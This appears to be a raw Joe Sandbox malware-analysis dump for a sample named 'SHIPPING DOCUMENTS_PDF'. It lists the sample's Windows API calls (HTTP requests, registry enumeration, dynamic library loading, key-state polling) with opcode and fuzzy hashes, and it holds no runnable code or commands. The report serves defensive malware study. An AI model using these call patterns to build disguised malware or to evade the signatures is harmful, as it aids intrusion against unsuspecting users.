                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                    • _memset.LIBCMT ref: 00BB2B87
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2BB6
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2C69
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BB2C97
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAD5D4
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BAD60A
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BAD61B
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BAD69D
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB27C0
                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BB27DC
                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00BB2822
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C15890,00000000), ref: 00BB286B
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                                                                      • Part of subcall function 00B5784B: _memmove.LIBCMT ref: 00B57899
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower_memmove
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 3425801089-567219261
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BA8F14
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BA8F27
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BA8F57
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 365058703-1403004172
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1872
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BC18A2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                                                                      • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                                                      • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3113390036-3916222277
                                                                                    APIs
                                                                                      • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                                                      • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                                                      • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BD6461
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00BD6468
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BD647D
                                                                                    • DestroyWindow.USER32(?), ref: 00BD6485
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00BB6DBC
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6DEF
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00BB6E01
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BB6E3B
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00BB6E89
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6EBB
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00BB6ECC
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BB6F06
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                                                                    • Instruction ID: a9f29f380e78b85402e79fa229611ef02716904f37e950940b41bbd360de12b4
                                                                                    • Opcode Fuzzy Hash: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                                                                    • Instruction Fuzzy Hash: DB2192755003069BDB209F69DC44AFAB7E8EF45720F200A59F9A1D72D0EBB4EC50CB50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00BBAC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BBACA8
• __swprintf.LIBCMT ref: 00BBACC1
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00BDF910), ref: 00BBACFF
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 43030e6679b10d4f666011bd82bdd16007abcd8dc30e2f5dc5883b784d9f443f
• Instruction ID: e077656c7554d7e48ecaa0b1fbcf18932779a22748b1594c79dd29201348ccba
• Opcode Fuzzy Hash: 43030e6679b10d4f666011bd82bdd16007abcd8dc30e2f5dc5883b784d9f443f
• Instruction Fuzzy Hash: 22217170A00109EFCB10DF64CD85EEEBBF8EF49715B0040E9F909AB261DA71EA45CB21
APIs
• CharUpperBuffW.USER32(?,?), ref: 00BB1B19
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: 531d7bc37e8de95fbaa465f9b86d91ae6251937c95ead9f8755d11641e7481f2
• Instruction ID: 62705b149c8d524d7f3e1972a5cb798f64ab68b785e72021af22a9cc65b57549
• Opcode Fuzzy Hash: 531d7bc37e8de95fbaa465f9b86d91ae6251937c95ead9f8755d11641e7481f2
• Instruction Fuzzy Hash: 7F113C709102099FCF10EF98D8629FEB7F4FF25704F5088E5D86567695EB32990ACB50
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BCEC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BCEC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BCED6A
• CloseHandle.KERNEL32(?), ref: 00BCEDEB
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
• Instruction ID: 51b2b4f1a95f94c2c1215edcb9abc5d0269b6c3fb8ed0d567ab3b890472004a3
• Opcode Fuzzy Hash: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
• Instruction Fuzzy Hash: 29815F716047019FD720EF28C886F2AB7E5AF44750F1488ADF96ADB2D2DBB0ED448B51
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
• Instruction ID: 38f9f4307beecffcefa8249c5b8ec4e16dbd60b88c8a93fbd5e50c39494d654b
• Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
• Instruction Fuzzy Hash: 6351A370A00B059BDB349F69D88066E77E6EF50321F24C7A9F83D962D4D7B1DE909B40
APIs
  • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
  • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD00FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BD0183
• RegCloseKey.ADVAPI32(?,?), ref: 00BD01AF
• RegCloseKey.ADVAPI32(00000000), ref: 00BD01BC
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: 2abe1ee8ab5acb46809dc3c2539f754ec42271aa5490d7f81e0c7ee71dcba321
• Instruction ID: 266d85fa75bb4f09f2f382e473766fdd2c573288a45c68372f14d48820ef6cbe
• Opcode Fuzzy Hash: 2abe1ee8ab5acb46809dc3c2539f754ec42271aa5490d7f81e0c7ee71dcba321
• Instruction Fuzzy Hash: 42518F71218204AFC714EF64CC91F6AB7E9FF84304F4449AEF955972A1EB31E909CB52
APIs
  • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
  • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCD927
• GetProcAddress.KERNEL32(00000000,?), ref: 00BCD9AA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00BCD9C6
• GetProcAddress.KERNEL32(00000000,?), ref: 00BCDA07
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCDA21
  • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
  • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 881e06a9dbd4c82d061a04e5d72f4b38c5e7186d0ee7448b35bb035fbabd19f9
• Instruction ID: b35dcd2790b90e576e24c887e1d70285aeecce45ba40f21efc01c42e733da825
• Opcode Fuzzy Hash: 881e06a9dbd4c82d061a04e5d72f4b38c5e7186d0ee7448b35bb035fbabd19f9
• Instruction Fuzzy Hash: 20510979A04209DFCB10EFA8C494EADB7F5EF09311B1480A9E956AB312DB31ED45CB51
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BBE61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BBE648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BBE687
  • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
  • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BBE6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BBE6B4
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 3fb6364bf3d3df12e96c051f69ac4b14863ed0acb21a3557f4bf1b6ca5c22df9
• Instruction ID: 0dbc1dddae5b4f5edfe6d729659bc166eed39fee89411fd3c29819a9e56fae4a
• Opcode Fuzzy Hash: 3fb6364bf3d3df12e96c051f69ac4b14863ed0acb21a3557f4bf1b6ca5c22df9
• Instruction Fuzzy Hash: CE510A35A00609DFCB01EF64C981AADBBF5EF09355B1480E9E819AB361DB31ED15DF50
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
• Instruction ID: 837725c2ec30b1cecbb31c3bc513095c6eea42b0c8d3c7bd931b189cb6fb3923
• Opcode Fuzzy Hash: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
• Instruction Fuzzy Hash: D0419035905104AFD724DF28CC99FA9FBE4EB0A310F1542A6E916B73E1EB30AD41DA51
APIs
• GetCursorPos.USER32(?), ref: 00B52357
• ScreenToClient.USER32(00C157B0,?), ref: 00B52374
• GetAsyncKeyState.USER32(00000001), ref: 00B52399
• GetAsyncKeyState.USER32(00000002), ref: 00B523A7
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 7492d296b4f9080bc1803cebcf8420b07befc5669a73d3d94c0bdb1f645896f5
• Instruction ID: 34de76a36a9653a3d1949844d0818f7a3f38d73ac9e56505eaf24f78a4df0ab7
• Opcode Fuzzy Hash: 7492d296b4f9080bc1803cebcf8420b07befc5669a73d3d94c0bdb1f645896f5
• Instruction Fuzzy Hash: 68419075608105FFCF159F68C884BE9FBB4FB05360F20439AF829A22A0CB309954DFA0
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA63E7
                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00BA6433
                                                                                    • TranslateMessage.USER32(?), ref: 00BA645C
                                                                                    • DispatchMessageW.USER32(?), ref: 00BA6466
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA6475
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
• Instruction ID: b3d3e32ba7d05e0493b568a9955c54ddb4ec59e9f23509ddaa17dbf6249b4fd2
• Opcode Fuzzy Hash: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
• Instruction Fuzzy Hash: 603194B1909646DFDB248F749C84BFABBE8EB07300F1841A5E425C72A1EB359859D750
APIs
• GetWindowRect.USER32(?,?), ref: 00BA8A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00BA8ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BA8AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00BA8AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BA8AF8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
• Instruction ID: 99f2ac96d5d9ad2996b14af6d9e6d281a1c5b1138d1f6b41153782fc9b3efe1f
• Opcode Fuzzy Hash: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
• Instruction Fuzzy Hash: 8A31E071504219EBDF14CFA8D94CAAE7BB5EB05315F10826AF925E75D0DBB09910CB90
APIs
• IsWindowVisible.USER32(?), ref: 00BAB204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BAB221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BAB259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BAB27F
• _wcsstr.LIBCMT ref: 00BAB289
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: a08da2bb5b83a75424ee1154c458665d3fb5316e097564f831f2d13a93acb841
• Instruction ID: 5ab9bb711509fe66688db91bd34c57863d562ac779ede417a65db95340fc3519
• Opcode Fuzzy Hash: a08da2bb5b83a75424ee1154c458665d3fb5316e097564f831f2d13a93acb841
• Instruction Fuzzy Hash: 5321D332609201BAEB255B759C49E7FBFD8DB4A710F0081BBF819DA1A2EF61DC409660
APIs
  • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
• GetWindowLongW.USER32(?,000000F0), ref: 00BDB192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BDB1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BDB1CF
• GetSystemMetrics.USER32(00000004), ref: 00BDB1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BC0E90,00000000), ref: 00BDB216
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: ce907034c8355dfa288e5718932d800fe21684382df13fdfed1a5d8f6f12fdd3
• Instruction ID: de97e543382c44f8ff237782b3f357a31f9c46cd3093634d832838ca2d77f79d
• Opcode Fuzzy Hash: ce907034c8355dfa288e5718932d800fe21684382df13fdfed1a5d8f6f12fdd3
• Instruction Fuzzy Hash: 96217171924251EFCB109F389C54F6ABBE4FB06361B16477AA926D72E0F73098108B90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA9320
  • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9352
• __itow.LIBCMT ref: 00BA936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9392
• __itow.LIBCMT ref: 00BA93A3
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
• Instruction ID: 5d5e5aa2c79838977157d133af85896c7851c2d665f8e905aba186da1a06f67c
• Opcode Fuzzy Hash: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
• Instruction Fuzzy Hash: A2210731709208ABDF109A609C89EAE7BFCEF4AB10F0480A5FD05D72D0DAB0CD45A795
APIs
• IsWindow.USER32(00000000), ref: 00BC5A6E
• GetForegroundWindow.USER32 ref: 00BC5A85
• GetDC.USER32(00000000), ref: 00BC5AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 00BC5ACD
• ReleaseDC.USER32(00000000,00000003), ref: 00BC5B08
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
• Instruction ID: b6779ba382c50132d251980f2f63fae786167ec92b0f9adc63b83d7c35860843
• Opcode Fuzzy Hash: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
• Instruction Fuzzy Hash: B5219F35A01104AFD710EF65D884AAABBE9EF48310F1480B9F80A97362DE70ED41CB90
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B5134D
• SelectObject.GDI32(?,00000000), ref: 00B5135C
• BeginPath.GDI32(?), ref: 00B51373
• SelectObject.GDI32(?,00000000), ref: 00B5139C
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 189ae3b54ace29611bae6e966355f32b9926adfb57273b94e9439d6c19ac8a6b
• Instruction ID: d2250bdebbea5a3b3ae303cf63a0962f9b57108ff75f7bbb29f38047b5192839
• Opcode Fuzzy Hash: 189ae3b54ace29611bae6e966355f32b9926adfb57273b94e9439d6c19ac8a6b
